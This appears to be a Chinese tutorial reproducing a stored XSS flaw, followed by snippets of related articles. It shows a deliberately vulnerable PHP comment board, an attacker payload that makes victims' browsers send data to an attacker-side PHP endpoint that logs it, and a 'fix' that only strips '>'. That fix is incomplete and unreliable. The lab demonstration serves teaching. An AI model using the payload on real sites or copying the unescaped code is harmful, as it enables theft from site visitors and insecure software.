2. 程式人生 > 實用技巧 >儲存型 XSS 原理復現

儲存型 XSS 原理復現

阿新 發佈:2020-12-24

儲存型 XSS 原理復現


漏洞最少會影響 3 個邏輯實體:

  • 受害者瀏覽器
  • 攻擊者伺服器
  • Web 應用伺服器
  • Web 應用資料庫(可有可無)

製作漏洞

Web 應用伺服器:

<?php
    // 顯示多個使用者的評論
    // 獲取使用者提交的評論,並存儲
    $file = fopen('comment.txt','a');
    fwrite($file,$_GET['comment'].'<br/>');
    fclose($file);

    // 在頁面中顯示所有評論
    echo '<h1>元芳,你怎麼看</h1>';
    $file = fopen('comment.txt','r');
    fpassthru($file);
?>

利用漏洞

攻擊者提交的評論:

http://172.168.30.78:8080/?comment=
<script>var ele=document.createElement('img');ele.src="http://172.168.30.78:8080/hack.php?info=" + navigator.platform;</script>

攻擊者的伺服器:

<?php
    $info = $_GET['info'];
    $file = fopen('1.txt','a');
    fwrite($file,$info);
?>

修復漏洞

應用伺服器:

<?php
    // 顯示多個使用者的評論
    // 獲取使用者提交的評論,並存儲
    $file = fopen('comment.txt','a');
    fwrite($file,str_replace('>','',$_GET['comment']).'<br/>');
    fclose($file);

    // 在頁面中顯示所有評論
    echo '<h1>元芳,你怎麼看</h1>';
    $file = fopen('comment.txt','r');
    fpassthru($file);
?>

相關推薦

儲存 XSS 原理復現

儲存 XSS 原理復現 漏洞最少會影響 3 個邏輯實體: 受害者瀏覽器 攻擊者伺服器

反射 XSS 原理復現

反射 XSS 復現記錄 整個漏洞含有三個實體: 攻擊者 受害者 網頁伺服器:http://192.168.64.2/index.php

程式碼審計學習—zzcms儲存xss

程式碼審計學習—zzcms儲存xss 版本:zzcms 201910 本地搭建網站 漏洞位置: 網站/inc/function.php

【專案】 Java 過濾器 解決儲存xss攻擊問題

技術標籤:專案Javaxss攻擊JavafilterrequestinputStream XSS攻擊場景 攻擊者可以通過構造URL注入JavaScript、VBScript、ActiveX、HTML或者Flash的手段,利用跨站指令碼漏洞欺騙使用者,收集Cookie等相關資料並冒

Catfish(鯰魚) Blog V1.3.15儲存 xss

Catfish(鯰魚) Blog前臺文章評論處存在 儲存xss漏洞。在 application\\index\\controller\\index.php 檔案第 692行

浮點原理介紹及在記憶體中的儲存形式

浮點原理介紹及在記憶體中的儲存形式 C語言提供了浮點資料型別,單精度浮點數float和雙精度浮點數double。浮點數屬於不精確的資料型別,本文將通過float型別的原理和在記憶體中的儲存形式來介紹浮點不精確的原

WEB安全-反射XSS漏洞原理和實踐

XSS(跨站指令碼攻擊) 定義 瀏覽器將使用者輸入的內容,當做指令碼執行,執行了惡意的功能,這種針對使用者瀏覽器的攻擊即跨站指令碼攻擊。

2021-01-07 儲存跨站指令碼XSS Stored

儲存XSS原理: 攻擊者在頁面插入xss程式碼,服務端將資料存入資料庫,當用戶訪問存在xss漏洞的頁面時,服務端從資料庫取出資料展示到頁面上,導致xss程式碼執行,達到攻擊效果。

java多機制原理特點詳解

java多機制是什麼 java中實現多的機制是依靠父類或介面的引用指向子類。從而實現了一個物件多種形態的特性。其中父類的引用是在程式執行時動態的指向具體的例項,呼叫該引用的方法時,不是根據引用變數的型別中定

MySQL MyISAM預設儲存引擎實現原理

預設MyISAM的表會在磁碟中產生3個檔案:.frm(表結構檔案)、.MYD(資料檔案)、.MYI(索引檔案)

Python動態強型別解釋語言原理解析

PYTHON是一門動態解釋性的強型別定義語言:編寫時無需定義變數型別;執行時變數型別強制固定;無需編譯,在直譯器環境直接執行。

C++多重繼承及多原理例項詳解

一、多重繼承的二義性問題 舉例: #include <iostream> using namespace std; class BaseA {

XSS原理及程式碼分析

前言 XSS又叫跨站指令碼攻擊,是一種對網站應用程式的安全漏洞攻擊技術。它允許惡意使用者將程式碼注入網頁,其他使用者在瀏覽網頁時就會受到影響。XSS分為三種:反射儲存型,和DOM。下面我會構造有缺陷的程式

pikachu靶場之DOMxss

DOM,全稱Document Object Model,是一個平臺和語言都中立的介面,可以使程式和指令碼能夠動態訪問和更新文件的內容、結構以及樣式。

xss原理解析

xss->跨站指令碼攻擊 xss是指攻擊者在網頁中嵌入客戶端指令碼。通常是指javascript編寫的一個危險程式碼,當用戶使用瀏覽器瀏覽網頁時,指令碼就會在使用者的瀏覽器上執行,從而達到攻擊者的目的。

Python面向物件多實現原理及程式碼例項

指同一個方法呼叫由於物件不同可能會產生不同的行為。 關於多要注意以下幾點:

12年高階工程師的“飛昇之路”,Android多實現原理

1. Kotlin ? Kotlin 通常被視為下一個 Java,它是由谷歌和 JetBrains(Android Studio 開發者)贊助的。Java 從一開始就一直是 Android 應用的首選開發語言,但近年來 Kotlin 迅速普及,如今在 10,000 種 Google

HBase底層儲存結構和原理

1、資料儲存結構 (1)邏輯結構   邏輯上是一張表,有行有列,但是物理上是k-v儲存的。

2022-01-07 DOMXSS

DOMxss不像反射xss儲存xss那樣會與後臺互動,DOMxss的實現過程都是在前臺。

雜湊表概述及其儲存過程(存取原理)

雜湊表概述及其儲存過程(存取原理) 1.雜湊表的資料結構 ​ jdk1.8之前陣列+(單)連結串列